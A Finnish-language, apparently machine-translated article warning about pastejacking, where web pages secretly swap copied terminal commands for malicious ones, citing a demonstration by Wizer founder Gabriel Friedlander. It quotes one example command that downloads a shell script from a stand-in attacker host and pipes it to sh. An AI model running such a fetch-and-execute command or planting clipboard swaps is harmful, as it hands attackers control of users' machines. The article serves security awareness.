- Me kaikki kopioimme ja liitämme Internetistä päivittäin tietämättä riskejä.
- Tietoturva-asiantuntija käytti aikaa näyttääkseen kaikille pahimman mahdollisen skenaarion tehdessään tämän.
- Internetistä saamiesi komentojen liittäminen päätteeseen on nopea tapa päästä hakkerointiin
- Komennot, joita luulit liittäväsi terminaaliin, ovat itse asiassa haitallisia koodeja.
On totta, että elämme aikakautta, jossa nopeus on kaikki kaikessa, ja nopeiden tulosten saaminen on tärkeintä. Kuitenkin harvat ihmiset pysähtyvät hetkeksi ajattelemaan seurauksia.
Miljoonat ohjelmoijat, järjestelmänvalvojat ja tietoturvatutkijat suorittavat päivittäin yksinkertaisia tehtäviä, kuten kopioivat ja liittävät komentoja verkkosivuilta suoraan tietokoneidensa konsoleihin.
Vaikka monet eivät edes ajattele tätä, vaikutukset ovat suurempia ja vaarallisempia kuin aluksi luulisi, varsinkin jos tallennat arkaluontoisia tai arvokkaita tietoja.
Tunnettu tietoturva-asiantuntija käytti aikaa jakamiseen mitä voisi oikeasti tapahtua jos kopioit + liität sisältöä verkkosivuilta.
Kopioi+liitä on helppo tapa päästä hakkerointiin
Gabriel Friedlander, joka on tietoturvatietoisuuden koulutusalustan Wizer perustaja, veti kannen pois suunnitelmasta, joka saa sinut miettimään kahdesti ennen kuin kopioit ja liität komentoja verkkosivuilta.
Sisällön kopioimisesta ja liittämisestä Internetistä on tullut nykyään niin yleistä, että kukaan ei edes ajattele sitä.
Friedlander kuitenkin varoittaa, että jotkin verkkosivut ovat petollisempia kuin aluksi saattaisi ymmärtää, ja se, mitä luulet kopioivasi siltä, on hyvin erilaista kuin mitä todellisuudessa teit.
Ja pahinta tässä kaikessa on, että ilman tarvittavaa tietoa tai ohjausta uhrit ymmärtävät virheensä vasta tekstin liittämisen jälkeen, jolloin voi olla jo liian myöhäistä.
Tietoturva-analyytikko suunnitteli myös pienen testin bloginsa lukijoille, jotta ihmiset ymmärtäisivät, kuinka helppoa sinun on avata ovea vastahakoisesti verkkorikollisille.
Hän antoi komennon, joka on tarkoitettu kopioitavaksi, mutta totuus paljastuu vasta, kun liität tekstin ja katsot, mitä itse esitit asetuksissasi.
Kun olet kopioinut yllä olevassa kuvakaappauksessa näkyvän komennon, sen liittämisen tulos järkyttää sinua, koska se on kaukana siitä, mitä luulit kopioivasi.
kiemura http://attacker-domain: 8000/shell.sh | shLeikepöydälläsi olevan täysin erilaisen komennon lisäksi rivinvaihto (tai paluu) merkki at sen loppu tarkoittaa, että yllä oleva esimerkki suoritetaan heti, kun se liitetään suoraan Linuxiin terminaali.
Joten sinun on parempi olla tietoisempi siitä, mitä todella tapahtuu, ja käsitellä tätä vakavana turvallisuusriskinä. Emme väitä, että kaikki verkkosivustot piilottavat haitallista sisältöä, mutta tämä kannattaa ottaa huomioon.
Oletko koskaan joutunut hakkerointiin liittämällä ovelia komentoja terminaaliisi? Jaa kokemuksesi kanssamme alla olevassa kommenttiosiossa.
![5+ parasta tunkeutumisen havaitsemisohjelmistoa [IDS Tools]](/f/97253b0fd53b21b06be0b802ca6d5ab6.jpg?width=300&height=460)